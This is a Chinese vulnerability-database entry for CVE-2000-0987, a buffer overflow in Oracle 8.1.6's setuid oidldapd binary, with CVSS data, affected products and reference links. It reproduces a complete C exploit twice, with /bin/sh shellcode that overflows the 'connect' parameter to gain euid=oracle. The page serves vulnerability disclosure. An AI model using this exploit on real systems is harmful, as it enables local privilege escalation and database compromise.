CVE-2000-0987
CVSS4.6
发布时间 :2000-12-19 00:00:00
修订时间 :2008-09-10 15:06:16
NMCOE    

[原文]Buffer overflow in oidldapd in Oracle 8.1.6 allow local users to gain privileges via a long "connect" command line parameter.


[CNNVD]Oracle oidldapd存在缓冲区溢出漏洞(CNNVD-200012-159)

        Oracle 8.1.6版本oidldapd存在缓冲区溢出漏洞。本地用户借助超长"connect"命令行参数提升特权。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:oracle:internet_directory:2.0.6Oracle Internet Directory 2.0.6
cpe:/a:oracle:oracle8i:8.1.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0987
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0987
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-159
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/5401.php
(VENDOR_ADVISORY)  XF  oracle-oidldap-bo
http://www.securityfocus.com/archive/1/140709
(VENDOR_ADVISORY)  BUGTRAQ  20001020 In response to posting 10/18/2000 vulnerability in Oracle Internet Directory in Oracle 8.1.6
http://www.securityfocus.com/archive/1/140340
(UNKNOWN)  BUGTRAQ  20001018 vulnerability in Oracle Internet Directory in Oracle 8.1.6

- 漏洞信息

Oracle oidldapd存在缓冲区溢出漏洞
中危 缓冲区溢出
2000-12-19 00:00:00 2005-10-20 00:00:00
本地  
        Oracle 8.1.6版本oidldapd存在缓冲区溢出漏洞。本地用户借助超长"connect"命令行参数提升特权。

- 公告与补丁

        

- 漏洞信息 (183)

Oracle (oidldapd connect) Local Command Line Overflow Exploit (EDBID:183)
linux local
2000-11-16 Verified
0 n/a
N/A [点击下载]
/*
  Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux.
  I tested in RH 6.2 and 6.1. This code is a bullshit (i know
  please no comments about ;-)).

  If someone exports this to Sparc please tell me.

  synopsis: buffer overflow in oidldapd
    impact: any user gain euid=oracle.

  Dedicated to PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others.
*/

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET		13
#define DEFAULT_BUFFER_SIZE	700
#define NOP				0x90
#define ORACLE_HOME		"/usr/local/oracle/app/oracle/product/8.1.6"

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  sprintf(environ,"ORACLE_HOME=%s",ORACLE_HOME);
  putenv(environ);
  sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME);
  system(binary);
}


// milw0rm.com [2000-11-16]
		

- 漏洞信息 (20312)

Oracle Internet Directory 2.0.6 oidldap Vulnerability (EDBID:20312)
linux local
2000-10-18 Verified
0 Juan Manuel Pascual Escribá
N/A [点击下载]
source: http://www.securityfocus.com/bid/1828/info

Oracle Internet Directory 2.0.6 is a pre-alpha development release, available as both an addon package and in the Oracle Database Software release 8.1.6. A vulnerability has been found in the oidldap binary within the package.

A buffer overflow exists in the oidldap binary, which is setuid oracle. When executed on the command line, the oidldap binary performs an unsafe check of the ORACLE_HOME environment variable. It is possible for a malicous user to execute shell code through the ORACLE_HOME environment variable, allowing the user to inherit an euid of oracle. In a stock installation of Oracle 8.1.6, this could create a scenario which would allow a local user to compromise the integrity of a database.

/*
Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux. I tested in RH 6.2
and 6.1. This code is a bullshit (i know please no comments about ;-)).

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in oidldapd
impact:   any user gain euid=oracle.


Dedicated to PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others.
*/

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET                   13
#define DEFAULT_BUFFER_SIZE             700
#define NOP                            0x90
#define ORACLE_HOME             "/usr/local/oracle/app/oracle/product/8.1.6"

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;


  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  sprintf(environ,"ORACLE_HOME=%s",ORACLE_HOME);
  putenv(environ);
  sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME);
  system(binary);
}		

- 漏洞信息

9425
Oracle Internet Directory oidldapd connect Parameter Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2000-10-18 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站